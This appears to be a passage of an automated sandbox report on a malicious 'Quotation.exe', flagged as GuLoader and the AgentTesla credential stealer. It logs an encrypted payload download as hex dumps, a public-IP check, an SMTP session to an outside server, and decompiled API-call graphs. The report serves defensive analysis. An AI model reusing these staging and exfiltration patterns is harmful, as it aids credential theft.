                                                                                          Connection: Keep-Alive
                                                                                          2024-11-11 10:50:10 UTC4929INHTTP/1.1 200 OK
                                                                                          Content-Type: application/octet-stream
                                                                                          Content-Security-Policy: sandbox
                                                                                          Content-Security-Policy: default-src 'none'
                                                                                          Content-Security-Policy: frame-ancestors 'none'
                                                                                          X-Content-Security-Policy: sandbox
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Disposition: attachment; filename="tOeddgbBdkJdhfVWiAGiB87.bin"
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Credentials: false
                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Length: 240192
                                                                                          Last-Modified: Wed, 06 Nov 2024 22:26:18 GMT
                                                                                          X-GUploader-UploadID: AHmUCY17qQFT9D4jg1ZiLrp2sW8EaW8dOYsT50HomGPCbKb_3QtT4ZCbKdbjYFuioaVqg4Tal-CfNWH8Ag
                                                                                          Date: Mon, 11 Nov 2024 10:50:10 GMT
                                                                                          Expires: Mon, 11 Nov 2024 10:50:10 GMT
                                                                                          Cache-Control: private, max-age=0
                                                                                          X-Goog-Hash: crc32c=Iz7rfQ==
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close
                                                                                          2024-11-11 10:50:10 UTC4929INData Raw: a1 36 1c 29 31 79 35 e5 5e 74 0b 49 99 30 92 09 11 84 49 92 82 7f e9 4d 66 6f 09 54 a0 df dd 03 57 92 02 48 01 55 03 18 b5 41 d7 ec 3e 71 e9 5f 9b f2 0c 5a 41 cf 0e c4 ef 3d 85 5a b7 cc ae ea 2c 6f a8 99 44 6c d0 d2 ca c5 a5 62 59 bb d2 89 81 c2 e1 65 99 55 da 49 dc 6a 6c 06 5f 6f a6 51 84 09 3b 82 c2 30 65 83 a7 60 c1 7f 44 b8 98 ed 0d 4d f1 8a 54 fc 06 84 f6 cf 1b 55 97 00 ab 8e cf 42 0a c6 ea 9b a9 0a 6c e5 d8 6d 15 ae a6 29 62 4d a8 c6 a4 9f ac df 0e 17 f5 5f 0f 68 bf 0d cd 1f 2f d2 a8 33 04 7a 0e 54 ff e9 5b ef dc 9b f7 91 85 b3 6c ff 2b d3 da 85 99 de 27 0f 41 4c 63 32 59 f8 b3 15 69 bb 0c 9d db f4 6f 45 4e 8d ce 0e cb e2 cd a7 4d c8 92 02 39 34 f8 f4 41 50 04 58 1e 8b 85 87 5d ee 64 3c d3 8c 21 16 d5 98 f4 73 0d c7 39 3f 10 38 74 e8 64 fa 41 0b b3
                                                                                          Data Ascii: 6)1y5^tI0IMfoTWHUA>q_ZA=Z,oDlbYeUIjl_oQ;0e`DMTUBlm)bM_h/3zT[l+'ALc2YioENM94APX]d<!s9?8tdA
                                                                                          2024-11-11 10:50:10 UTC4837INData Raw: c4 b8 cd 80 71 9e 70 7a 2d 23 cb 3a 4c f8 bd a2 f5 63 98 1f 77 07 9e 5f 09 da 1f 36 21 ea 71 c7 b6 6d fc 67 61 8e 1b 2e 86 be cc 38 2b c2 73 b4 ff 7b ec 75 dc da 1e c5 37 c5 66 4f a1 2e 25 7b 58 34 19 5f 2e ac b1 c9 69 cd 2e 85 f6 12 f5 4c 49 12 d4 c4 6c ed b4 5c 59 ad d6 3e 58 e3 39 62 35 d3 99 41 b2 16 c6 c9 15 9b 07 78 ed 85 50 fb 6c 2f 3e 00 3a 86 24 fc 06 f3 bc 2a 21 ff 00 aa ed f5 14 84 10 69 12 95 bb 16 fd 71 dc fb 47 2f f6 aa 5c b5 70 e2 de 14 11 47 74 77 a9 eb 7f 3b 55 76 24 94 c4 bb e1 8a c9 39 d3 74 41 3a 04 48 4a a7 8e 62 d1 fe 09 63 e9 f4 e2 13 03 d5 a1 7b a9 bb b0 b6 e6 1a 3d 7a 95 2a b9 c1 8b 95 61 aa 82 8d d4 af 21 7e b3 20 6c 41 13 fb 6d b1 86 20 bb b3 95 6a 1d 0a 5d 53 73 f4 f9 fa d1 93 65 71 31 24 cf d4 e8 04 75 1f 1e 41 4b 5b 19 b1 e7
                                                                                          Data Ascii: qpz-#:Lcw_6!qmga.8+s{u7fO.%{X4_.i.LIl\Y>X9b5AxPl/>:$*!iqG/\pGtw;Uv$9tA:HJbc{=z*a!~ lAm j]Sseq1$uAK[
                                                                                          2024-11-11 10:50:10 UTC1326INData Raw: 4e 45 58 93 06 b2 f1 54 0d 3c d6 06 3f c8 a5 c6 99 3d 4f 9f 0b 6d bd 13 29 4e 69 25 01 92 05 3e 98 c2 bb f2 76 ca 62 54 ee 55 1c 35 4a fb 18 aa 5c cf 94 6e b2 2e 26 e5 c0 0e c2 a4 a7 07 b5 13 f9 ee a7 b1 3b 2c 19 12 ff 21 36 1e 40 97 1a 84 ad cc 3c 4a 6c 3e 2a 54 eb 69 1b f7 b0 4f 24 cf b9 19 cb a7 f6 e3 32 27 2e d9 35 8b 6f e4 01 2d 1f 40 64 05 7d a2 0e 7a d5 8f 46 13 34 47 02 0a 73 06 8d e0 a3 2d d2 79 99 67 84 de 54 3e dd 90 09 79 90 96 21 7a 2f e5 a3 5a 36 7e d7 8c cc 58 c0 ec 2e 18 74 68 a3 36 14 89 3f 03 36 4b ff 38 47 d1 7c 8f 25 9e 8c 8f b9 2f 84 c0 b1 86 4b ac cb 0a 2b 46 19 e9 65 c6 6c 04 a3 c5 40 42 58 c8 46 d1 43 77 7c c5 2d ed be 04 e4 03 d1 6d 50 33 17 65 2b 61 9f f5 65 bd 99 f7 1c 05 47 8e 81 25 2a 01 16 50 63 fb b4 ae f0 7f d8 80 92 14 6c
                                                                                          Data Ascii: NEXT<?=Om)Ni%>vbTU5J\n.&;,!6@<Jl>*TiO$2'.5o-@d}zF4Gs-ygT>y!z/Z6~X.th6?6K8G|%/K+Fel@BXFCw|-mP3e+aeG%*Pcl
                                                                                          2024-11-11 10:50:10 UTC1378INData Raw: a7 00 62 a9 b9 71 77 98 72 14 37 cd bd 2e 51 73 8b 19 aa 27 7f bf ad c6 9a f8 a3 d0 bb 93 16 39 24 20 8f 50 a9 47 89 dd d0 56 97 30 4b 98 1b 77 b2 61 05 22 6f 34 83 f5 ac b4 8e 57 05 e9 49 f1 7a b1 6c 22 df a8 2b 15 d0 be a6 0d 55 19 ad dc 5c b4 55 87 2a 18 bb 2d e8 1b fd 5a ae 4a 50 9f 91 a0 2f 76 92 8b 4a 78 bf a6 6c 07 94 fd 54 2d 36 e6 05 3f 2f a5 ff 97 35 4f 9f 22 8e bf 13 29 6e 8d 2b 02 92 c3 35 95 c2 bb 0c 84 ca 61 74 dc 50 1c 35 b4 04 20 88 4a cf 94 90 40 26 26 cd 00 02 c3 ae 6b 59 b5 13 f8 30 af b1 3b 0c f4 1c fc 21 c8 ee 40 94 1a 5a a3 c0 3c 6a 96 3f 13 45 15 68 22 2b bc 4f 24 cf bd 18 cb af ca e3 32 2d f0 c7 36 8b 6f 70 55 06 5f 60 60 0f 83 ac f4 7b cc a9 46 13 34 47 05 06 73 7a 10 ec af 29 0c 61 9b 67 7a 2c 54 07 ee 92 09 79 45 64 2b 7a 07 fb
                                                                                          Data Ascii: bqwr7.Qs'9$ PGV0Kwa"o4WIzl"+U\U*-ZJP/vJxlT-6?/5O")n+5atP5 J@&&kY0;!@Z<j?Eh"+O$2-6opU_``{F4Gsz)agz,TyEd+z
                                                                                          2024-11-11 10:50:10 UTC1378INData Raw: 23 0e 6b a9 b8 8d c0 d8 57 90 88 af dd 8a fb 1b 7a 17 ef 7a 92 aa f4 a9 84 73 47 e5 92 c8 7e d3 45 3c 05 36 e1 41 b1 fd 7d 6c 15 08 33 80 c9 a9 62 b7 c0 87 07 9c a7 bb 8f 59 9f 72 14 c9 3f b0 2d 71 7b 75 15 a9 d9 5e 83 a3 c6 9a 06 9a 99 ad 93 16 19 d3 2c 8f 50 a9 45 8b dd 90 09 64 cc b4 98 16 77 b2 61 05 2d 55 14 83 0b a0 49 87 77 05 92 2d f1 84 b4 ab 25 de a8 50 72 f0 bf a2 62 6e e7 a3 d9 7c b8 ab 8b 29 e6 95 28 e8 1b 03 a8 ac 73 75 9f 91 a0 17 8d 93 b2 40 40 49 58 93 d8 bf fd 54 2d db d8 05 3f 36 5a f3 94 3d 6f 93 33 ae bf ed 28 57 76 25 01 92 c3 35 94 c2 bb 34 a4 3b 9d 8b 82 19 1c 35 be 04 28 b0 5c 31 9d 92 be d4 2f ce fe 26 f1 ae 2b 45 9f 13 e3 20 ac b1 2b 0d 0a 12 f4 21 c8 01 6c 97 1a 7a a1 3e 32 69 68 06 59 54 15 68 22 2b bc 4c 24 11 b1 19 cb 8f 37
                                                                                          Data Ascii: #kWzzsG~E<6A}l3bYr?-q{u^,PEdwa-UIw-%Prbn|)(su@@IXT-?6Z=o3(Wv%54;5(\1/&+E +!lz>2ihYTh"+L$7
                                                                                          2024-11-11 10:50:10 UTC1378INData Raw: 3a 33 46 de 62 de 61 d7 af b4 d8 db f6 5a 46 d7 70 ec 5f 18 36 6b 50 62 86 96 18 e9 8a dc 3b 18 d0 6d 46 db 3e a9 4b eb 8c b7 51 83 96 e6 76 90 a5 c5 e0 dd 1d 7c a9 b8 96 0e d3 56 70 a8 af dd 86 fb 24 c5 37 ef 7a b2 a8 0a a7 86 8d 71 67 92 c8 80 df b8 30 27 32 c1 40 b1 03 7c ab 1a 31 2f 80 f1 26 9c be c0 a7 79 e8 a7 bb 75 7f c0 72 14 3d 09 1e 2d 51 73 55 17 a9 27 5f 44 a3 c4 9a 06 5c e5 af 93 36 3b da 2c 8f ae 56 72 9a dd 90 f7 48 cf b4 b8 1d 89 bc 61 fb 0c 6f 34 83 0b 5e b9 8c 77 05 17 45 f3 84 90 55 28 df a8 d5 14 c9 b5 a6 0d 55 e7 83 de 5c b4 ab 75 27 1a 9b 2b 16 17 ff a4 8f 70 55 9f 91 5e 16 4a 97 8b 4a 40 71 5d 93 f8 be c5 2e d2 da 29 f8 36 36 a4 84 e2 3d 4f 9b 16 50 b1 12 29 90 7e 25 01 ba a6 30 94 c8 45 05 7a c6 19 00 fc 55 18 1d b2 fa 21 b7 a2 c6
                                                                                          Data Ascii: :3FbaZFp_6kPb;mF>KQv|Vp$7zqg0'2@|1/&yur=-QsU'_D\6;,VrHao4^wEU(U\u'+pU^JJ@q].)66=OP)~%0EzU!
                                                                                          2024-11-11 10:50:10 UTC1378INData Raw: f3 39 bb 38 af b0 b9 d0 50 20 b8 7f 08 01 02 9c a3 d2 f5 d1 6e 91 c9 31 50 76 7f 02 ad e0 ee b5 5b 6d f6 dd 01 34 6c b6 84 03 4b 56 2f a8 9d 2d 9a 11 51 16 31 46 fe 62 20 60 ee 43 b5 e1 d1 08 53 46 d7 78 a0 5f 18 30 b5 5d 62 86 96 18 eb 8a dc 1b e2 dc 6d 46 05 36 90 4e eb 72 b6 50 a5 96 e6 76 56 fe 3a 1f 0a 72 7c a9 be 73 37 d0 56 b0 db af dd 8a 05 25 8b 2e e2 78 b2 a8 d4 a3 84 8d 49 18 9c c8 80 df b8 30 25 32 c1 56 b1 03 7c ab 1a 31 39 80 f1 26 48 97 d8 a7 02 9c 59 b5 71 57 9c 8c 18 37 33 93 67 51 73 75 eb a8 1e 55 ba ad c6 b0 26 e9 e9 ad 93 e8 37 da 2c 8f ae 5b 4b 88 fd f1 f7 68 cf 4a b9 24 55 b2 61 fb d2 65 34 83 2e db c3 8e 77 01 9b c5 f5 84 c0 7d 33 df a8 21 68 84 bf a6 09 75 85 a3 df 5c 4a a5 8b 29 18 65 27 e8 1b dd 96 af 73 55 61 90 99 1d 73 92 8b
                                                                                          Data Ascii: 98P n1Pv[m4lKV/-Q1Fb `CSFx_0]bmF6NrPvV:r|s7V%.xI0%2V|19&HYqW73gQsuU&7,[KhJ$Uae4.w}3!hu\J)e'sUas
                                                                                          2024-11-11 10:50:10 UTC1378INData Raw: de bf 16 4d 1f 1a bf b9 57 19 de fe c2 61 38 28 c7 18 f9 3c 25 d0 ab b3 62 34 7a 2b 2c e4 30 d4 14 7d a4 a6 eb 13 9b c8 99 73 ad 02 b2 db 46 f1 7c 87 19 d3 7d 9b 2c af 4e b8 17 7c 20 b8 7f 08 04 02 9c a6 95 81 d1 6e 6b ba 8a 43 76 0f 2a 48 e9 ef bf 06 69 f6 dd 05 54 46 4b 7b fc 95 65 2f a8 9d 2d 98 11 51 36 cd 4a fe 62 fe 69 d7 51 b5 1f d0 cf 50 46 d7 50 c7 7f 11 36 95 5e 9c 88 96 e6 e5 74 d0 1b 1c f0 54 46 25 3f 6e 4f d2 9b b7 69 86 68 ef 77 a8 d7 37 1f 22 37 3c 06 47 72 c1 f1 6c 90 a8 af 23 84 fb 24 d4 e9 e3 7a b2 88 d1 a9 84 8d b7 e7 ab ea 80 df 46 c2 2c 32 e1 64 ca 77 7c 55 1f 7a ed 84 f1 56 4a ac c0 a7 08 e1 d3 bb 71 53 bc 54 14 37 33 4d 23 51 73 75 eb a5 27 5f 9a 86 c6 9a 06 5c e8 94 b1 16 39 da d2 86 50 57 6e f3 a9 90 f7 6c bd 5e bc 1d 07 9a 7a fb
                                                                                          Data Ascii: MWa8(<%b4z+,0}sF|},N| nkCv*HiTFK{e/-Q6JbiQPFP6^tTF%?nOihw7"7<Grl#$zF,2dw|UzVJqST73M#Qsu'_\9PWnl^z
                                                                                          2024-11-11 10:50:10 UTC1378INData Raw: a3 a1 b0 c6 be 29 2b 7a 9f 5d bf 86 8b 91 31 ba 95 8d d4 5b 52 51 b2 20 96 b3 1f f9 4d c8 d5 20 bb 3d e9 63 16 0a 59 ad 55 d6 f5 04 d8 93 9b 10 29 24 cf 20 99 36 74 3f 48 bf 47 59 e7 df c7 1e 6d 38 28 19 02 f9 3c 00 55 de 8a 40 30 08 a1 d7 ed 40 fc 2a 06 d0 ac 96 63 e9 1a 99 53 8e 2a a9 db b8 f5 01 f3 19 2d 75 bb 38 8f 44 b8 e9 72 de b9 46 d4 08 02 9c 78 a0 81 d1 4b ee cf b3 54 72 7d be b3 e0 9e 97 3d 19 f6 d7 78 60 2d b6 80 23 be 58 2f a8 63 dd 96 11 51 c8 3f 46 fe 42 d3 61 d7 51 4b e0 e8 d4 5a 46 d7 ae e4 5f 18 13 ee 2a 62 86 92 94 43 8f dc 6b 34 cb 6d 46 2f 42 e4 4e eb 88 97 67 86 96 e6 88 a6 f7 3a 1f dc 3b 7c a9 98 8e 3e d1 56 6e a9 96 ca 8a fb 24 2a 1e ee 7a 92 a0 f4 a9 84 cd 85 11 6d 37 a0 db 46 3c 25 cc ef 41 b1 03 82 59 1b 08 13 c8 f1 26 62 49 c1
                                                                                          Data Ascii: )+z]1[RQ M =cYU)$ 6t?HGYm8(<U@0@*cS*-u8DrFxKTr}=x`-#X/cQ?FBaQKZF_*bCk4mF/BNg:;|>Vn$*zm7F<%AY&bI
                                                                                          2024-11-11 10:50:10 UTC1378INData Raw: fb ca 20 f4 aa 7f 30 0a e0 de ee 6f 61 72 05 de c3 64 4b 28 4d 58 e0 c0 45 e9 a8 af 11 db 74 bf 32 76 53 4a 59 f2 4a c4 de 64 69 17 fa 1f 12 c4 d2 a2 7b db 8e 90 d8 96 32 2b 84 9b 20 cb 86 75 99 11 82 b5 dc d4 a5 5c af b3 19 7f bf 1f f9 93 ca d4 20 9b b4 e8 5a 1c 4a 87 5c 80 09 d9 56 d8 93 65 e0 27 24 cf de 6b 3a 74 1f 3a 8b 47 59 19 20 ff 05 4f 38 28 e7 f5 f0 3c 25 0b d1 fe 40 34 7e 59 e0 eb 30 a4 19 1d d0 a6 e1 6a 9d 1a 9d 77 fd 1f a9 db 46 05 0f f3 19 d3 87 b7 38 af 6e e1 e9 72 20 46 7e cf 02 02 9c 86 83 a1 8b 6e 95 bb 4d 5a 76 0f 2a 48 ec ee bf 06 3a f6 dd 05 ea 2c 8f 8e 03 b5 58 05 88 b9 d3 96 11 af 38 33 46 fe 9c d2 61 d7 71 ad e1 d1 f6 a4 47 ee 47 ed 5f 18 c8 9c 5f 62 a6 b0 e6 e5 8a 9c 2c eb 2f 92 66 3c 3f 90 4e 15 82 b7 69 86 68 ea 76 a8 d7 4b 1f
                                                                                          Data Ascii: 0oardK(MXEt2vSJYJdi{2+ u\ ZJ\Ve'$k:t:GY O8(<%@4~Y0jwF8nr F~nMZv*H:,X83FaqGG__b,/f<?NihvK


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.949908172.67.74.1524434068C:\Users\user\Desktop\Quotation.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-11 10:50:11 UTC155OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                          Host: api.ipify.org
                                                                                          Connection: Keep-Alive
                                                                                          2024-11-11 10:50:11 UTC399INHTTP/1.1 200 OK
                                                                                          Date: Mon, 11 Nov 2024 10:50:11 GMT
                                                                                          Content-Type: text/plain
                                                                                          Content-Length: 13
                                                                                          Connection: close
                                                                                          Vary: Origin
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e0db84fee27c434-EWR
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1089&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=2635122&cwnd=250&unsent_bytes=0&cid=b7f88e346fde0d52&ts=112&x=0"
                                                                                          2024-11-11 10:50:11 UTC13INData Raw: 36 36 2e 32 33 2e 32 30 36 2e 31 30 39
                                                                                          Data Ascii: 66.23.206.109


                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                          Nov 11, 2024 11:50:14.159353018 CET5874992967.23.226.139192.168.2.9220-super.nseasy.com ESMTP Exim 4.96.2 #2 Mon, 11 Nov 2024 05:50:14 -0500
                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                          220 and/or bulk e-mail.
                                                                                          Nov 11, 2024 11:50:14.159611940 CET49929587192.168.2.967.23.226.139EHLO 226533
                                                                                          Nov 11, 2024 11:50:14.284239054 CET5874992967.23.226.139192.168.2.9250-super.nseasy.com Hello 226533 [66.23.206.109]
                                                                                          250-SIZE 52428800
                                                                                          250-8BITMIME
                                                                                          250-PIPELINING
                                                                                          250-PIPECONNECT
                                                                                          250-STARTTLS
                                                                                          250 HELP
                                                                                          Nov 11, 2024 11:50:14.284497976 CET49929587192.168.2.967.23.226.139STARTTLS
                                                                                          Nov 11, 2024 11:50:14.411748886 CET5874992967.23.226.139192.168.2.9220 TLS go ahead

                                                                                          Click to jump to process

                                                                                          Click to jump to process

                                                                                          Click to dive into process behavior distribution

                                                                                          Click to jump to process

                                                                                          Target ID:0
                                                                                          Start time:05:48:32
                                                                                          Start date:11/11/2024
                                                                                          Path:C:\Users\user\Desktop\Quotation.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\Quotation.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:1'196'832 bytes
                                                                                          MD5 hash:5BDCC2D33CA974C1D8448AFCF83F74D1
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2334492638.000000000A0C3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:6
                                                                                          Start time:05:49:52
                                                                                          Start date:11/11/2024
                                                                                          Path:C:\Users\user\Desktop\Quotation.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\Quotation.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:1'196'832 bytes
                                                                                          MD5 hash:5BDCC2D33CA974C1D8448AFCF83F74D1
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2801542235.00000000383DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2801542235.00000000383B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2801542235.00000000383B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:false

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:30.2%
                                                                                            Dynamic/Decrypted Code Coverage:25.9%
                                                                                            Signature Coverage:16.5%
                                                                                            Total number of Nodes:826
                                                                                            Total number of Limit Nodes:19
                                                                                            execution_graph 2806 6ff8167a 2807 6ff816b7 2806->2807 2848 6ff82351 2807->2848 2809 6ff816be 2810 6ff817ef 2809->2810 2811 6ff816cf 2809->2811 2812 6ff816d6 2809->2812 2894 6ff81fcb 2811->2894 2878 6ff82049 2812->2878 2817 6ff81740 2822 6ff81791 2817->2822 2823 6ff81746 2817->2823 2818 6ff81722 2907 6ff82209 2818->2907 2819 6ff8170a 2837 6ff81700 2819->2837 2904 6ff82f9f 2819->2904 2820 6ff816eb 2821 6ff816f5 2820->2821 2826 6ff81702 2820->2826 2821->2837 2888 6ff82d14 2821->2888 2830 6ff82209 9 API calls 2822->2830 2925 6ff81f1e 2823->2925 2825 6ff81728 2917 6ff81668 2825->2917 2898 6ff817f7 2826->2898 2838 6ff8177e 2830->2838 2835 6ff81708 2835->2837 2836 6ff82209 9 API calls 2836->2838 2837->2817 2837->2818 2840 6ff817de 2838->2840 2928 6ff8200d 2838->2928 2840->2810 2843 6ff817e8 GlobalFree 2840->2843 2843->2810 2845 6ff817cf 2845->2840 2932 6ff815c5 2845->2932 2846 6ff817c2 FreeLibrary 2846->2845 2936 6ff812f8 GlobalAlloc 2848->2936 2850 6ff8237f 2937 6ff812f8 GlobalAlloc 2850->2937 2852 6ff82a3a GlobalFree GlobalFree GlobalFree 2853 6ff82a5a 2852->2853 2869 6ff82aa7 2852->2869 2854 6ff82af7 2853->2854 2859 6ff82a73 2853->2859 2853->2869 2855 6ff82b19 GetModuleHandleW 2854->2855 2854->2869 2857 6ff82b2a LoadLibraryW 2855->2857 2858 6ff82b3f 2855->2858 2856 6ff82947 GlobalAlloc 2872 6ff8238a 2856->2872 2857->2858 2857->2869 2944 6ff81f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2858->2944 2865 6ff812e1 2 API calls 2859->2865 2859->2869 2861 6ff829bd GlobalFree 2861->2872 2862 6ff8299f lstrcpyW 2862->2872 2863 6ff82b8e 2864 6ff82b9c lstrlenW 2863->2864 2863->2869 2945 6ff81f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2864->2945 2865->2869 2866 6ff829af lstrcpyW 2866->2872 2867 6ff82b4c 2867->2863 2876 6ff82b78 GetProcAddress 2867->2876 2869->2809 2870 6ff82bb6 2870->2869 2872->2852 2872->2856 2872->2861 2872->2862 2872->2866 2873 6ff82822 GlobalFree 2872->2873 2875 6ff829fb 2872->2875 2938 6ff812f8 GlobalAlloc 2872->2938 2939 6ff812e1 2872->2939 2873->2872 2875->2872 2942 6ff81309 GlobalSize GlobalAlloc 2875->2942 2876->2863 2881 6ff8205e 2878->2881 2879 6ff8208b 2879->2881 2882 6ff821be GlobalFree 2879->2882 2947 6ff81548 2879->2947 2952 6ff819db 2879->2952 2881->2879 2881->2882 2883 6ff82124 GlobalAlloc WideCharToMultiByte 2881->2883 2884 6ff82154 GlobalAlloc CLSIDFromString 2881->2884 2886 6ff812e1 lstrcpynW GlobalAlloc 2881->2886 2882->2881 2885 6ff816dc 2882->2885 2883->2882 2884->2881 2885->2819 2885->2820 2885->2837 2886->2881 2890 6ff82d26 2888->2890 2889 6ff82dcb ReadFile 2893 6ff82de9 2889->2893 2890->2889 2955 6ff82cbf 2893->2955 2895 6ff81fde 2894->2895 2896 6ff81fe9 GlobalAlloc 2895->2896 2897 6ff816d5 2895->2897 2896->2895 2897->2812 2902 6ff81823 2898->2902 2899 6ff818a8 2901 6ff818ac GlobalSize 2899->2901 2903 6ff818b5 2899->2903 2900 6ff81897 GlobalAlloc 2900->2903 2901->2903 2902->2899 2902->2900 2903->2835 2905 6ff82faa 2904->2905 2906 6ff82fea GlobalFree 2905->2906 2958 6ff812f8 GlobalAlloc 2907->2958 2909 6ff82280 MultiByteToWideChar 2913 6ff82211 2909->2913 2910 6ff822a6 StringFromGUID2 2910->2913 2911 6ff822b7 lstrcpynW 2911->2913 2912 6ff822ee GlobalFree 2912->2913 2913->2909 2913->2910 2913->2911 2913->2912 2914 6ff82325 GlobalFree 2913->2914 2915 6ff815eb 2 API calls 2913->2915 2959 6ff81638 2913->2959 2914->2825 2915->2913 2963 6ff812f8 GlobalAlloc 2917->2963 2919 6ff8166d 2920 6ff81f1e lstrcpyW 2919->2920 2921 6ff81677 2920->2921 2922 6ff815eb 2921->2922 2923 6ff81633 GlobalFree 2922->2923 2924 6ff815f4 GlobalAlloc lstrcpynW 2922->2924 2923->2838 2924->2923 2926 6ff81f5c lstrcpyW 2925->2926 2927 6ff81765 2925->2927 2926->2927 2927->2836 2929 6ff8201c 2928->2929 2930 6ff817a4 2928->2930 2929->2930 2931 6ff82033 GlobalFree 2929->2931 2930->2845 2930->2846 2931->2929 2933 6ff815dd 2932->2933 2934 6ff815eb 2 API calls 2933->2934 2935 6ff815e6 2934->2935 2935->2840 2936->2850 2937->2872 2938->2872 2946 6ff812f8 GlobalAlloc 2939->2946 2941 6ff812f0 lstrcpynW 2941->2872 2943 6ff81327 2942->2943 2943->2875 2944->2867 2945->2870 2946->2941 2948 6ff812f8 GlobalAlloc 2947->2948 2949 6ff81555 2947->2949 2948->2879 2950 6ff812e1 2 API calls 2949->2950 2951 6ff8156a 2950->2951 2951->2879 2953 6ff81a48 2952->2953 2954 6ff819ea VirtualAlloc 2952->2954 2953->2879 2954->2953 2956 6ff82cd8 2955->2956 2957 6ff82ccd GetLastError 2955->2957 2956->2837 2957->2956 2958->2913 2960 6ff8163f 2959->2960 2961 6ff81663 2959->2961 2960->2961 2962 6ff81648 lstrcpyW 2960->2962 2961->2913 2962->2961 2963->2919 3279 6ff8103a 3280 6ff81052 3279->3280 3281 6ff810c5 3280->3281 3282 6ff81081 3280->3282 3283 6ff81061 3280->3283 3285 6ff8156c GlobalFree 3282->3285 3295 6ff8156c 3283->3295 3290 6ff81079 3285->3290 3286 6ff81072 3288 6ff8156c GlobalFree 3286->3288 3287 6ff81091 GlobalSize 3289 6ff8109a 3287->3289 3288->3290 3291 6ff8109e GlobalAlloc 3289->3291 3292 6ff810af 3289->3292 3290->3287 3290->3289 3293 6ff815c5 2 API calls 3291->3293 3294 6ff810b8 GlobalFree 3292->3294 3293->3292 3294->3281 3297 6ff81572 3295->3297 3296 6ff81578 3296->3286 3297->3296 3298 6ff81584 GlobalFree 3297->3298 3298->3286 3327 6ff82ebf 3328 6ff82ed7 3327->3328 3329 6ff81309 2 API calls 3328->3329 3330 6ff82ef2 3329->3330 3341 40362d 3342 403653 3341->3342 3343 40363f SetTimer 3341->3343 3344 40365c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3342->3344 3345 4036aa 3342->3345 3343->3344 3344->3345 2413 404f70 2414 405111 2413->2414 2415 404f8f 2413->2415 2416 405125 GetDlgItem GetDlgItem 2414->2416 2419 40515e 2414->2419 2415->2414 2417 404f9b 2415->2417 2418 4054f8 18 API calls 2416->2418 2421 404fa0 SetWindowPos 2417->2421 2422 404fba 2417->2422 2423 405148 SetClassLongW 2418->2423 2420 4051b5 2419->2420 2432 401399 90 API calls 2419->2432 2433 40510c 2420->2433 2484 4054c6 2420->2484 2424 4050fd 2421->2424 2426 40500d 2422->2426 2427 404fbf ShowWindow 2422->2427 2431 401533 90 API calls 2423->2431 2523 405739 2424->2523 2429 405015 DestroyWindow 2426->2429 2430 40502f 2426->2430 2427->2424 2428 404fe4 GetWindowLongW 2427->2428 2428->2424 2434 405000 ShowWindow 2428->2434 2435 405446 2429->2435 2436 405034 SetWindowLongW 2430->2436 